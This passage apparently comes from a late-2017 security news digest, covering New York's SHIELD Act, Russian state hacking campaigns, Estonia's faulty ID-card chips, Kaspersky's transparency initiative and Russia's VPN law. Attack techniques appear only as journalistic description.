It is worth noting that Schneiderman's SHIELD Act is not the same as Senator Markey's proposed Cyber Shield Act. A draft (PDF) of Markey's bill coincidentally became available last week. While Markey's proposal is to bake security into IoT devices, Schneiderman's proposal is to bring security to businesses by through reasonable security safeguards with new controls over breach disclosure backed by financial sanctions.

Under current New York law, companies can compile personally identifiable information (PII), but are not required to meet any data security requirements if that PII does not include a social security number -- for example, the current law does not require companies to report data breaches of username-and-password combinations, or biometric data like the fingerprint used to unlock an iPhone. The changes will be achieved through amendments to the existing General Business Law and the State Technology Law.

The SHIELD Act requires businesses to adopt "reasonable" administrative, technical, and physical safeguards for sensitive data. Its scope covers any business that holds New Yorkers' sensitive data rather than simply conducts business within New York. It expands the types of data that trigger reporting requirements, to include username-and-password combinations, biometric data, and HIPAA-covered health data.

Penalties for violation are increased. It allows the attorney general to seek civil penalties and injunctions if businesses do not provide adequate security for PII. This could be $5,000 for each violation, or up to $20 for each instance of failed notification (up to a total of $250,000).

The attempt by Schneiderman is to protect New Yorkers' personal data just as the European General Data Protection Regulation (GDPR) seeks to protect European's personal information. Schneiderman, however, tries to be more business-friendly. Firstly, the penalties are much lower. Secondly, the required breach disclosure timeline is more flexible. "The disclosure shall be made in the most expedient time possible and without unreasonable delay, consistent with the legitimate needs of law enforcement..."

Thirdly, there is an explicit encryption exemption. PII is only classified as PII "when either the personal information or the data element is not encrypted or encrypted with an encryption key that has also been ACCESSED OR acquired."

Fourthly, it provides a safe harbor against attorney general enforcement for companies already compliant with the NYS DFS, Gramm-Leach-Bliley, and HIPAA regulations; and those with independent certification of compliance with ISO and NIST standards. And fifthly, it provides a flexible approach for small businesses provided they "implement and maintain reasonable safeguards that are appropriate to the size and complexity of the small business."

David Zetoony, the leader of Bryan Cave's consumer protection practice, commented, "Providing a safe harbor for companies that go above-and-beyond to certify good data security is innovative, unique, and friendly to business. It rewards businesses that go the extra mile to audit and verify compliance with an industry data security practice, removing the costs and unpredictability of government litigation. It also does not penalize smaller businesses that have good security practices, but cannot afford the significant cost of annual data security audits and certifications. This is the type of thought leadership needed to improve data security legislation across the country."

Despite these exemptions and flexibility, the Shield Act will enforce stronger personal data protection than has so far been required outside of the regulated New York financial institutions. The definition of a data breach is broadened to include an unauthorized person gaining access to information, while the reach of the law has been widened from companies that do business in New York to companies that hold personal information of New Yorkers.

"While the federal government drags their feet we must act to protect New Yorkers. The SHIELD Act will serve as a blueprint for NY and the rest of the nation to follow to keep Americans safe," said co-sponsor Senator David Carlucci.


US Identifies 6 Russian Government Officials Involved In DNC Hack

3.11.2017 thehackernews BigBrothers

The United States Department of Justice has reportedly gathered enough evidence to charge at least six Russian government officials for allegedly playing a role in hacking DNC systems and leaking information during the 2016 presidential race.
Earlier this year, US intelligence agencies concluded that the Russian government was behind the hack and expose of the Democratic National Committee (DNC) emails in order to influence the 2016 presidential election in Donald Trump's favour.
Now, citing people familiar with the investigation, the Wall Street Journal reported on Thursday that United States federal prosecutors could bring charges against the alleged unnamed Russian officials early next year.
The US federal intelligence investigators also believe that "dozens" of other Russian officials may have also participated in the DNC hack, which was allegedly ordered by Russian President Vladimir Putin himself.
However, both Putin and Russian government officials have denied allegations.
The DNC computer system hack last year led to thousands of stolen DNC emails, including personal and sensitive emails from Hillary Clinton campaign manager John Podesta, appeared on whistleblowing website WikiLeaks.
In a separate forensic investigation conducted by FireEye incident response firm Mandiant identified hacking tools and techniques used in the DNC hack associated with Fancy Bear—also known as APT28, Sofacy, Sednit, and Pawn Storm—a state-sponsored hacking group believed to be a unit of Russian Military Intelligence (the GRU).
U.S. federal agents and prosecutors in Washington, Pittsburgh, Philadelphia and San Francisco have been cooperating with the DNC investigation. However, none of them has revealed the actual identity of the six suspects.
However, even after getting charged, the Russian officials or hackers will hardly be prosecuted in the United States until they enter the US soil because the country has no extradition agreement with Russia.
This is the second time in this year when the United States has charged Russian officials with cyber crimes.
In March 2017, the DoJ charged two Russian intelligence officers—Dmitry Aleksandrovich Dokuchaev and Igor Anatolyevich Sushchin—and two criminal hackers—Alexsey Alexseyevich Belan and Karim Baratov—in connection with the 2014 Yahoo hack that exposed about 500 million Yahoo user accounts.
However, no one has ever seen the insides of a United States courtroom.


Estonia suspends security digital certificates for up to 760,000 state-issued electronic ID-cards over Identity-Theft risk
3.11.2017 securityaffairs BigBrothers

It has happened, one of the most cyber-savvy states, Estonia decided to block Electronic ID Cards over identity theft risk.
On Thursday, Estonia announced that it would suspend security digital certificates for up to 760,000 state-issued electronic ID-cards that are using the buggy chips to mitigate the risk of identity theft.

The decision comes after IT security researchers recently discovered a vulnerability in the chips used in the cards manufactured by the Swiss company Trub AG that open the doors to malware-based attacks.

The Prime Minister Juri Ratas announced the decision to suspend security certificates for cards until their owners download an update to patch the flaw.

“The functioning of an e-state is based on trust and the state cannot afford identity theft happening to the owner of an Estonian ID card,” explained Prime Minister Juri Ratas on Thursday.

“By blocking the certificates of the ID cards at risk, the state is ensuring the safety of the ID card,”

“As far as we currently know, there has been no instances of e-identity theft, but the threat assessment of the Police and Border Guard Board and the Information System Authority indicates that this threat has become real,”

In September, the Gemalto-owned announced they were helping the Estonian government on solving the problem.

Since October 31, all users having faulty ID cards can update their security certificates remotely and at Estonian police and border guard service points.

As of Thursday night, around 40,000 users had already updated their certificates.

Estonia cyber

Estonia is considered the most technological European Country, it tested e-voting since 2005, for this reason, it is called E-stonia

Estonia has already issued 1.3 million electronic ID cards offering citizens online access to a huge number of services through the “e-government” state portal. The Estonian electronic ID cards have been manufactured by the Swiss company Trub AG and its successor Gemalto AG since 2001.

According to the Government experts, other cards based on the same faulty chips are exposed to the same cyber risk.


Russia-Linked Hackers Target Turkish Critical Infrastructure
3.11.2017 securityweek BigBrothers

A Russia-linked threat group has been targeting people associated with Turkish critical infrastructure through compromised Turkish sites, according to threat management firm RiskIQ.

Called Energetic Bear, but also known as Dragonfly and Crouching Yeti, the group has been active since at least 2010. First detailed in 2014, the threat group has been focused mainly on the energy sector in the United States and Europe.

In July, Cisco revealed that the group has used template injection in attacks aimed at energy facilities and other critical infrastructure organizations in the United States. At least a dozen power firms in the country were hit in these attacks, including the Wolf Creek nuclear facility in Kansas.

In late October, the Department of Homeland Security and Federal Bureau of Investigation issued a joint alert to warn of an attack campaign associated with the group that has been ongoing since at least May 2017. The attacks target entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors.

RiskIQ now reveals that the group leveraged a supply chain attack to compromise a website belonging to a Turkish energy company and later used the site as a watering hole attack targeting people associated with Turkish critical infrastructure.

The group injected the site with SMB credential-harvesting malware and the security researchers managed to link the infrastructure to related Turkish sites that were compromised for the same purpose.

To set up their attacks, Energetic Bear compromises websites that give them exposure to specific targets, RiskIQ explains. They used the same technique for the website of Turcas Petrol, a Turkish energy company, located at turcas.com.tr.

The URL of an image the group included on the website “redirects to a link using the file:// scheme, which forces the connection through the file protocol, which then allows the group to harvest Microsoft SMB credentials,” the RiskIQ's researchers explained. The compromise appears targeted at Turcas Petrol and those close with the business, which is a tactic typically employed by Energetic Bear.

According to RiskIQ, the SMB credential harvesting host is not always directly included on the websites, but an intermediary host is typically used to redirect visitors to SMB harvesting (possibly after some filtering is done).

“Additionally, the URL format of the file requested, which in this case was turcas_icon.png, is not related to the referring website. Instead, Energetic Bear seems to use a form of tagging to correlate any possible victims and their source website. The format we observed is <tag>_icon.png and <tag>.png,” the RiskIQ team says.

RiskIQ discovered that the threat group has compromised ‘general purpose’ websites too, such as plantengineering.com, which serves as an information and news hub for the critical infrastructure sector and which is owned by CFE Media LLC. Two other sites registered with the same email address were also compromised, namely controleng.com and csemag.com.

The security researchers believe that CFE Media’s other websites were affected as well, “because they’re geared toward engineers working in the critical infrastructure sector and thus prime targets for this watering hole attack.” They also note that the compromise campaign likely started between beginning of February and the end of March.


Russian 'Fancy Bear' Hackers Abuse Blogspot for Phishing
3.11.2017 securityweek BigBrothers
The cyber espionage group known as Fancy Bear, which is widely believed to be backed by the Russian government, has been abusing Google’s Blogspot service in recent phishing attacks.

Threat intelligence firm ThreatConnect spotted the use of the blogging service while analyzing attacks aimed at Bellingcat, a group of investigative journalists that uses open source information to report on various events taking place around the world.

Fancy Bear, also known as Pawn Storm, APT28, Sofacy, Sednit, Strontium and Tsar Team, was first seen targeting Bellingcat in 2015 as part of a campaign aimed at entities investigating Russia’s involvement in the downing of Malaysia Airlines flight MH17 in July 2014 as it was crossing a conflict zone in Ukraine.

The latest attacks aimed at Bellingcat involved fake emails instructing users to change their Gmail passwords as a result of unauthorized activity on their account, and Dropbox invitations to view shared folders.

The buttons included in these emails pointed to a randomly generated Blogspot subdomain set up to redirect visitors to a phishing page. The phishing sites used HTTPS and they were hosted on subdomains that may have tricked many individuals into thinking they were legitimate. Experts believe the attackers likely used Blogspot in an effort to get past spam filters.

“A URL hosted on Google's own systems, in this case Blogspot, may be more likely to get past spam filters than URLs hosted on a third party IP address or hostname,” ThreatConnect researchers said in a blog post.

Fancy Bear is believed to be behind many high profile attacks, including a campaign that may have attempted to interfere in last year’s presidential election in the United States.

Researchers at SecureWorks reported last year that they had identified thousands of Gmail accounts targeted by the hackers. The security firm recently provided the entire list of accounts to The Associated Press, whose reporters have analyzed them in an effort to find who they belong to.

They identified the email addresses of entities in 116 countries, including former U.S. Secretaries of State John Kerry and Colin Powell, NATO Supreme Commanders Air Force Gen. Philip Breedlove and Army Gen. Wesley Clark, defense contractors such as Raytheon and Lockheed Martin, U.S. politicians and intelligence officials, Ukrainian officials and the pope’s representative in Kiev, and Russian opponents of the Kremlin.


Estonia Blocks Electronic ID Cards Over Identity-Theft Risk
3.11.2017 securityweek BigBrothers
Cyber-savvy Estonia said on Thursday it would suspend security certificates for up to 760,000 state-issued electronic ID-cards with faulty chips as of Friday midnight to mitigate the risk of identity theft.

Dubbed E-stonia for being one of the world's most wired nations, the Baltic eurozone state of 1.3 million people issues electronic ID cards giving citizens online access to virtually all public services at a special "e-government" state portal.

IT security experts recently discovered a flaw in the Swiss-made chips used in the cards that makes them vulnerable to malware.

"The functioning of an e-state is based on trust and the state cannot afford identity theft happening to the owner of an Estonian ID card," Prime Minister Juri Ratas said Thursday as he announced the decision to suspend security certificates for cards until their owners download an update to patch the flaw.

"By blocking the certificates of the ID cards at risk, the state is ensuring the safety of the ID card," Ratas said.

"As far as we currently know, there has been no instances of e-identity theft, but the threat assessment of the Police and Border Guard Board and the Information System Authority indicates that this threat has become real," he added.

Estonia has made a name for itself for being a trailblazer in technology, notably pioneered e-voting in 2005 and playing host to NATO's cyber defence centre.

Estonian authorities also warned that other cards and computer systems using the chips produced by the same manufacturer were also at risk.

Since 2001 Estonian electronic ID cards have been manufactured by the Swiss company Trub AG and its successor Gemalto AG.

In September, Trub Baltic AS that belongs to the Gemalto group, announced they were cooperating with the Estonian government on solving the problem.

As of October 31, all users of faulty ID cards can update their security certificates remotely and at Estonian police and border guard service points.

As of Thursday night around 40,000 users had already done so.


North Korea Denies Involvement in WannaCry Cyberattack
1.11.2017 securityweek BigBrothers
North Korea has slammed Britain for accusing it of being behind a global ransomware attack that hit the National Health Service, calling the allegation a "wicked attempt" to further tighten international sanctions against Pyongyang.

A third of Britain's public hospitals were affected by the WannaCry worm in May, according to a government report.

Up to 300,000 computers in 150 countries were hit by WannaCry, which seized systems and demanded payment in Bitcoin to return control to users.

Some researchers have pointed the finger at Pyongyang, saying that the code used was similar to past hacks blamed on Kim Jong-Un's regime.

British Home Office minister Ben Wallace told the BBC last week that London was "as sure as possible" that North Korea was responsible.

But a spokesman for the North's Korea-Europe Association denied the accusations and warned Britain against "groundless speculation".

"This is an act beyond the limit of our tolerance and it makes us question the real purpose behind the UK's move," he said, in a statement carried by the official Korean Central News Agency late Monday.

"The moves of the UK government to doggedly associate the DPRK with the cyberattack cannot be interpreted in any other way than a wicked attempt to lure the international community into harboring greater mistrust of the DPRK," the spokesman said, using the initials of the North's official name.

According to the South Korean government, the North has a 6,800-strong unit of trained cyberwarfare specialists. It has been accused of launching high-profile cyberattacks, including the 2014 hacking of Sony Pictures.

Experts say the North appears to have stepped up cyberattacks in recent years in a bid to earn hard foreign currency in the face of tougher United Nations sanctions imposed over its nuclear and missile programs.


VPN Law Latest Step in Kremlin Online Crackdown: Experts
30.10.2017 securityweek BigBrothers
A law coming into force on Wednesday will give the Kremlin greater control over what Russians can access online ahead of a presidential election next March.

Providers of virtual private networks (VPNs) -- which let internet users access sites banned in one country by making it appear that they are browsing from abroad -- will be required to block websites listed by the Russian state communications watchdog.

The law is the latest in a raft of restrictions introduced by President Vladimir Putin's government and is expected to affect journalists and opposition activists, even though several VPN providers say they will not comply.

Videos by the punk band Pussy Riot and the blog of opposition leader Alexei Navalny have in the past been blocked under a law that allows authorities to blacklist websites they consider extremist.

"Journalists and activists who are using this to put out messages anonymously will be affected," Eva Galperin, director of cybersecurity at the US-based Electronic Frontier Foundation, told AFP.

Even if they are able to work around the new restrictions, the law will send a powerful message to activists, she said.

"If you're thinking about taking the steps that you need to stay anonymous from the government, you think maybe it's not worth it."

The law will likely be selectively applied and will probably not affect foreign business people using company VPNs, she said.

The measure is part of a wider crackdown on online communications, which this month saw the popular messaging app, Telegram, fined for failing to register with the Roskomnadzor communications watchdog and provide the FSB with information on user interactions.

Starting from 2018, companies on the Roskomnadzor register must also store all the data of Russian users inside the country, according to anti-terror legislation which was passed last year and decried by the opposition and internet companies.

On Thursday, the Russian parliament's lower house approved a draft law that would let the attorney general blacklist the websites of "undesirable organisations" without a court order.

- 'Less safe, less free' -

While falling short of a blanket ban on virtual private networks, the new law undermines one of their key purposes and "essentially asks VPN services to help enforce Russia's censorship regime", Harold Li, vice president at ExpressVPN International, told AFP by email.

"VPNs are central to online privacy, anonymity, and freedom of speech, so these restrictions represent an attack on digital rights," Li said.

"We hope and expect that most major VPN services will not bend to these new restrictions."

Providers ZenMate and Private Internet Access -- which said it removed all of its servers from Russia in 2016 after several of them were seized by authorities without notification -- have already announced that they would not enforce the list of banned websites.

Companies that do not comply are likely to see their own websites placed on the Russian blacklist.

Amnesty International has called the new legislation "a major blow to internet freedom" and Edward Snowden, the NSA whistleblower who lives in Russia, said the measure "makes Russia both less safe and less free".

Laws curbing internet freedoms were drafted following mass protests in 2011 and 2012 against Putin over disputed election results.

The new measures come into force ahead of presidential elections next March, when Putin is widely expected to extend his grip on power to 2024.

Russia's opposition groups rely heavily on the internet to make up for their lack of access to the mainstream media.

- 'Complete control' -

"The path that Russia chose four years ago is founded on the concept of digital sovereignty," said Sarkis Darbinyan, lawyer and director of the Digital Rights Centre.

"It's the idea that the government should control the domestic part of the internet. Western countries do not support this concept and so what we are seeing today is an Asian-style development of the internet," along the lines of China and Iran, he said.

But Galperin of the Electronic Frontier Foundation noted that even if the Kremlin's end goal is "complete control of communications on the internet", its technical capabilities still lag way behind China with its "Great Firewall".

Many of the invasive measures pushed by the Kremlin are comparable with the snooping powers demanded by Western governments, she said.

"Russia will frequently point to the fact that the FBI and (British Prime Minister) Theresa May want these powers as reasons why they should have them, and why they're compatible with human rights."


Moving Target Defense Startup Cryptonite Emerges From Stealth
26.10.2017 securityweek BigBrothers
Cryptonite, a Rockville, Maryland-based startup that aims to prevent reconnaissance and lateral movement in the network using moving target defense and micro-segmentation technologies, has emerged from stealth mode.

The company’s product, the CryptoniteNXT network appliance, implements what is known as a Zero Trust environment, which is achieved by minimizing access to resources and visibility within the network to the absolute minimal subset needed by users to carry out their job.

CryptoniteNXT, which sits between the perimeter firewall and the organization’s internal wired and wireless networking devices (i.e. switches and wireless access points), uses a concept known as moving target defense (MTD) to make systems “invisible.”CryptoniteNXT

The MTD technology, implemented by a CryptoniteNXT component named Net Guard, aims to prevent an attacker who already has access from mapping the network and finding vulnerable systems that they could exploit. This solution can also provide protection against insiders and malicious actors who are already on the network when the product is deployed as previous network maps become unusable.

“CryptoniteNXT Net Guard does this by transforming the endpoint’s view of the network into a dynamic, abstract structure, in effect making the once static network into a dynamic moving target,” Cryptonite said. “Net Guard MTD creates a mapping from the obfuscated network to the real network to enable the flow of traffic across the traditional network infrastructure.”

In order to restrict lateral movement within the network, CryptoniteNXT uses a component named Micro Shield Segmentation. This ensures that users only have visibility into the machines needed to do their job, preventing malicious insiders and attackers from moving freely across the network.

Cryptonite says the product and the Zero Trust environment it creates can be used to address a wide range of risks, including ones associated with the lack of updates and patches, insecure IoT devices, and mobile devices.

Initial research and development into Cryptonite’s MTD technology was funded by the U.S. Department of Homeland Security (DHS) and the Department of Defense (DoD).

Cryptonite, a spin-off of Maryland defense contractor Intelligent Automation (IAI), is led by President and CEO Michael Simon, and Justin Yackoski, CTO and former lead researcher at IAI.

Cryptonite is backed by several investors, including Tenable founder Ron Gula; David Walker, founder of Pangia Technologies; Al Nardslico, founder of SMS; Abtin Buergari, founder of Modus eDiscovery; Don Rogers, co-founder of Shulman Rogers; and Dr. Leonard Haynes, co-founder of IAI.


Kaspersky May Have Found How Russian Hackers Stole NSA Data
25.10.2017 securityweek BigBrothers
Security firm Kaspersky Lab has shared preliminary results from its investigation following media reports that Russian hackers used its software to steal sensitive NSA data from a contractor’s computer back in 2015.

The Wall Street Journal reported earlier this month that a threat group working for the Russian government stole information on how the U.S. hacks foreign networks and how it defends against cyberattacks. The files were allegedly taken in 2015 from the personal computer of an NSA contractor who had been using a security product from Kaspersky Lab.

The article suggested that Kaspersky either knowingly helped the Russian government obtain the files or that the hackers exploited vulnerabilities in the company’s software without the firm knowing about the attack.

Kaspersky immediately launched an internal investigation into the matter and it has now shared preliminary results.

Kaspersky revealed in June 2015 that its own systems had been breached as part of an attack involving Duqu 2.0 malware, which has been linked to Israeli intelligence. The company’s latest investigation has found no evidence of additional intrusions.

As for the 2015 event reported by WSJ, the starting point of Kaspersky’s investigation is an APT-related incident that occurred in 2014. At the time, the company’s systems detected what appeared to be source code for malware used by the Equation Group, a threat actor believed to be associated with the NSA. At this point, the firm had not made its Equation Group research available to the public.

A Kaspersky home product had detected what appeared to be new Equation Group malware samples on a device in the United States. The antivirus had been configured to automatically send new malware samples back to the company for analysis.

The user in question later intentionally downloaded malware-laden piracy software, specifically a Microsoft Office key generator, and temporarily disabled the Kaspersky product on the machine as it would have prevented the installation of the tool. The malware, detected as Backdoor.Win32.Mokes.hvl, remained on the device for an unspecified period and it opened a backdoor on the system, giving hackers easy access to the computer.

When the antivirus was re-enabled, it detected both Backdoor.Win32.Mokes.hvl and other pieces of malware linked to the Equation Group. One of the files, a 7zip archive, was automatically sent to Kaspersky Lab for analysis, but the company’s CEO, Eugene Kaspersky, ordered the removal of the files from all systems after determining that it was Equation malware source code. The files were not shared with third parties before being deleted, Kaspersky said.

According to the company, no other malware was detected by its products on that device in 2015. After the activities of the Equation Group were made public by the company in February 2015, Equation Group malware was detected on several other IPs in the same range as the initial infection, but the devices appeared to be configured as honeypots and Kaspersky said it did not process the detections in any special way.

The company said it did not detect any other related incident since. It also claimed that an analysis of its software confirmed that it had not created any detection rules for non-malicious documents containing keywords such as “classified” or “top secret” – this aims to reinforce its initial statement that it does not intentionally spy for the Russian government.

Kaspersky also pointed out that it routinely informs the U.S. government about active APT attacks detected in the county.

“We believe the above is an accurate analysis of this incident from 2014. The investigation is still ongoing, and the company will provide additional technical information as it becomes available,” Kaspersky said.

Several recent media reports focused on Kaspersky’s alleged connection to the Kremlin, which has led to many U.S. officials raising concerns regarding the use of company’s products. Last month, the Department of Homeland Security (DHS) ordered all government agencies to identify and remove the firm’s security products.

In an effort to clear its name, Kaspersky announced the launch of a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.


Microsoft Drops Lawsuit as U.S. Govt Limits Use of Gag Orders
24.10.2017 securityweek BigBrothers
Microsoft is dropping a lawsuit against the US government after the Department of Justice issued new rules limiting the use of secrecy orders that prevent firms from telling customers law enforcement has accessed their data.

The tech giant sued the government in April last year, but declared victory Monday and said it was ending its case after the DOJ announced it would revise its rules.

Brad Smith, Microsoft's chief legal officer, said the company had achieved "an unequivocal win for our customers" that protected the constitutional rights of US citizens.

"Until now, the government routinely sought and obtained orders requiring email providers to not tell our customers when the government takes their personal email or records," he wrote in a blog post.

"Sometimes these orders don't include a fixed end date, effectively prohibiting us forever from telling our customers that the government has obtained their data."

Smith acknowledged that secrecy orders were sometimes required for legitimate reasons -- such as protecting individuals at risk from harm or ensuring an investigation was not thwarted.

But, he added, at the time the lawsuit was filed, "the government appeared to be overusing secrecy orders in a routine fashion - even where the specific facts didn't support them".

"When we filed our case we explained that in an 18-month period, 2,576 of the legal demands we received from the U.S. government included an obligation of secrecy, and 68 percent of these appeared to be indefinite demands for secrecy," he said.

But in a memo issued last week, Deputy Attorney General Rod Rosenstein said any such gag order "should have an appropriate factual basis" and "should extend only as long as necessary to satisfy the government's interest".

While lauding the DOJ's decision, Microsoft repeated its call on US Congress to amend the 1986 Electronic Communications Privacy Act that regulates government access to contemporary electronic communications.

It comes as the US Supreme Court last week announced it would hear a separate privacy case that pits the Trump administration against Microsoft.

The case examines whether US law enforcement should be allowed to access evidence held on servers overseas during an investigation.

It comes after Microsoft refused to hand over emails during a US drug trafficking investigation on the basis the police's warrant did not extend to Ireland, where the messages were stored.


Kaspersky Opens Antivirus Source Code for Independent Review to Rebuild Trust
24.10.2017 thehackernews  BigBrothers

Kaspersky Lab — We have nothing to hide!
Russia-based Antivirus firm hits back with what it calls a "comprehensive transparency initiative," to allow independent third-party review of its source code and internal processes to win back the trust of customers and infosec community.
Kaspersky launches this initiative days after it was accused of helping, knowingly or unknowingly, Russian government hackers to steal classified material from a computer belonging to an NSA contractor.
Earlier this month another story published by the New York Times claimed that Israeli government hackers hacked into Kaspersky’s network in 2015 and caught Russian hackers red-handed hacking US government with the help of Kaspersky.
US officials have long been suspicious that Kaspersky antivirus firm may have ties to Russian intelligence agencies.
Back in July, the company offered to turn over the source code for the U.S. government to audit.
However, the offer did not stop U.S. Department of Homeland Security (DHS) from banning and removing Kaspersky software from all of the government computers.
In a blog post today the company published a four-point plan:
Kaspersky will submit its source code for independent review by internationally recognised authorities, starting in Q1 2018.
Kaspersky also announced an independent review of its business practices to assure the integrity of its solutions and internal processes.
Kaspersky will establish three transparency centres in next three years, "enabling clients, government bodies & concerned organisations to review source code, update code and threat detection rules."
Kaspersky will pay up to $100,000 in bug bounty rewards for finding and reporting vulnerabilities in its products.
"With these actions, we will be able to overcome mistrust and support our commitment to protecting people in any country on our planet." Kaspersky's CEO Eugene said.
However, infosec experts' twitter commentary shows that the damage has already been done.
"Code review is absolutely meaningless. All Russian intelligence need is an access to KSN, Kaspersky's data lake which is a treasure trove of data. Even open sourcing the entire product won't reveal or even help with revealing that." Amit Serper, the security researcher at Cybereason, tweeted.
Now it is important to see whether these actions will be enough to restore the confidence of US government agencies in Kaspersky or the company will be forced to move its base out of Russia.


DHS, FBI Warn of Ongoing APT Attack Against Critical Infrastructure
24.10.2017 securityweek BigBrothers
The Department of Homeland Security and Federal Bureau of Investigation have issued a joint technical alert warning that government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors are subject to an ongoing attack campaign from an advanced actor, most probably Dragonfly (aka Crouching Yeti and Energetic Bear).

The alert was first distributed by email and is now published by US-CERT. It warns, “Since at least May 2017, threat actors have targeted government entities and the energy, water, aviation, nuclear, and critical manufacturing sectors, and, in some cases, have leveraged their capabilities to compromise victims' networks.” The attack is considered to be ongoing.

The alert does not itself attribute the attack to any specific attacker, but it does comment, “The report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign.” Dragonfly's activities against western critical infrastructure -- and especially the energy sector -- have been known for many years. There have been many suggestions that the group operates out of Russia and may be connected to the Russian government.

This new alert from DHS/FBI would therefore suggest either an increase in tempo or growing success in Dragonfly's activities. It describes the attacks in relation to the seven-stage kill chain; but noticeably stops short of the final stage, 'actions on objective'. The implication is that the attacker is seeking a position for possible action against the critical infrastructure in the future.

The threat actors have chosen their targets rather than attacking targets of opportunity. Typically, this is followed by a spear-phishing campaign using email attachments to leverage Microsoft Office functions to retrieve a document using the Server Message Block (SMB) protocol. This sends the user's credential hash to the remote server, where “The threat actors then likely used password-cracking techniques to obtain the plaintext password. Once actors obtain valid credentials, they are able to masquerade as authorized users.”

Watering holes are also used to gather credentials. “The threat actors compromise the infrastructure of trusted organizations to reach intended targets,” notes the alert, adding, “Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure.”

When credentials have been gained, the attackers use these to access victims' networks where multi-factor authentication is not in use. Once inside the networks, the attackers download their tools from a remote server. In one example, the attacker downloaded multiple files, including INST.txt. This was renamed to INST.exe, run, and immediately deleted. “The execution of INST.exe,” says the alert, “triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of a compromised system of an intended target.” In its earlier report, Symantec associated the MD5 hash of INST.exe to Backdoor.Goodor.

There is no direct indication in this report that critical infrastructure operation technology (OT) networks have been compromised -- but it does state clearly that the IT networks have been breached. “This APT actor's campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors.”

The primary activity on the compromised networks seems to be reconnaissance, presumably to find OT weaknesses that could be exploited on demand. “Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. Specifically, the threat actors focused on identifying and browsing file servers within the intended victim's network. The threat actors viewed files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.”

The report adds, “In one instance, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. In this same incident, the threat actors created a malicious scheduled task that invoked ‘scr.exe’ with the arguments ‘scr.jpg’. The MD5 hash of scr.exe matched the MD5 of ScreenUtil, a tool used by the threat actor, as reported in the Symantec Dragonfly 2.0 report.”

“The latest U.S. power company attacks,” warns David Zahn, GM at PAS, “are an escalation that should be a wakeup call for all critical infrastructure companies that we need to do more. Even basics like knowing what cyber assets are in a power plant or industrial facility are missing today. If you cannot see it, you cannot secure it. If you cannot secure it, then understand that it may get worse before it gets better. Additional attention and investment are needed if we are to get ahead of these threats.”

The US-CERT alert comes with a long list of network signatures and host-based rules that can be used to detect malicious activity associated with the threat actors' TTPs. Both the DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided, and add the IPs to their watch list to determine whether malicious activity is occurring within their organization.


Kaspersky Aims to Clear Its Name With New Transparency Initiative
24.10.2017 securityweek  BigBrothers
Kaspersky Lab announced on Monday the launch of a new Global Transparency Initiative whose goal is to help the company clear its name following recent reports about its inappropriate ties to the Russian government.

There have been several media reports analyzing the company’s alleged connection to the Kremlin, which has led to many U.S. officials raising concerns regarding the use of Kaspersky products. It all culminated last month when the Department of Homeland Security (DHS) ordered all government agencies to identify and remove the firm’s security products.

The latest report on Kaspersky’s ties with Russia came from the Wall Street Journal, which claimed that Russian hackers had exploited Kaspersky software to steal NSA exploits. The news article did not provide too many details, but the main possible scenarios were that either Kaspersky colluded with the Russian government or that the hackers exploited vulnerabilities in the company’s products to access the NSA exploits.

Kaspersky has always denied any wrongdoing and it has often offered to allow governments to take a look at its source code to prove it. The company’s latest attempt to clear its reputation is the Global Transparency Initiative.

The first phase of the initiative includes an independent source code review that will be conducted by the first quarter of 2018. At a later time, the company’s software updates and threat detection rules will also be put under the microscope.

By Q1 2018, Kaspersky also wants an independent assessment of its secure development lifecycle processes, and its software and supply chain risk mitigation strategies. The firm has also proposed the development of additional controls to manage its data processing practices and confirmation of compliance with said controls by an independent party.

In order to give its partners – including government stakeholders – access to source code and other product components, Kaspersky plans on establishing three Transparency Centers in Asia, Europe and the United States. While the deadline for the three centers is 2020, the company wants to launch the first one next year.

Likely in response to the latest news report, which suggests that hackers may have stolen NSA files by exploiting a vulnerability in Kaspersky products, the security firm has promised to offer as much as $100,000 for severe vulnerabilities found in its products. The company currently offers $5,000 for serious flaws and wants to introduce the new maximum reward by the end of the year.

“Internet balkanization benefits no one except cybercriminals,” said Eugene Kaspersky, chairman and CEO of Kaspersky Lab. “Reduced cooperation among countries helps the bad guys in their operations, and public-private partnerships don’t work like they should. The internet was created to unite people and share knowledge.”

“Cybersecurity has no borders, but attempts to introduce national boundaries in cyberspace is counterproductive and must be stopped. We need to reestablish trust in relationships between companies, governments and citizens,” he added. “That’s why we’re launching this Global Transparency Initiative: we want to show how we’re completely open and transparent. We’ve nothing to hide. And I believe that with these actions we’ll be able to overcome mistrust and support our commitment to protecting people in any country on our planet.”

Eugene Kaspersky has been invited by the U.S. House of Representatives’ Oversight Subcommittee of the Committee on Science, Space, and Technology to testify and respond to the accusations brought against his company. However, the hearing was initially scheduled too soon, which did not give him enough time to obtain a U.S. visa. The hearing will be rescheduled for a later date, Kaspersky said on Twitter.


Russian Spies Lure Targets With NATO Cybersecurity Conference
24.10.2017 securityweek  BigBrothers
A cyber espionage group linked to Russia has been trying to deliver malware to targeted individuals using documents referencing a NATO cybersecurity conference, Cisco’s Talos research team reported on Monday.

The attack has been linked to the notorious threat actor known as APT28, Pawn Storm, Fancy Bear, Sofacy, Group 74, Sednit, Tsar Team and Strontium.

The campaign was apparently aimed at individuals interested in the CyCon U.S. conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) in collaboration with the Army Cyber Institute at West Point on November 7-8 in Washington, D.C. The hackers created malicious documents with information that was copied from the official CyCon U.S. website.

The topic used as bait in this attack suggests that the threat actor targeted individuals with an interest in cyber security.

APT28 has been known to use zero-day exploits in its operations and, earlier this month, researchers noticed that the hackers had started leveraging a Flash Player vulnerability that Adobe had patched just two days prior. However, in the campaign analyzed by Cisco Talos, the attackers did not use any zero-days.

Instead, they relied on Office documents containing a VBA script. The goal was to deliver Seduploader, a piece of malware which has been used by the threat actor in other NATO-related attacks as well.

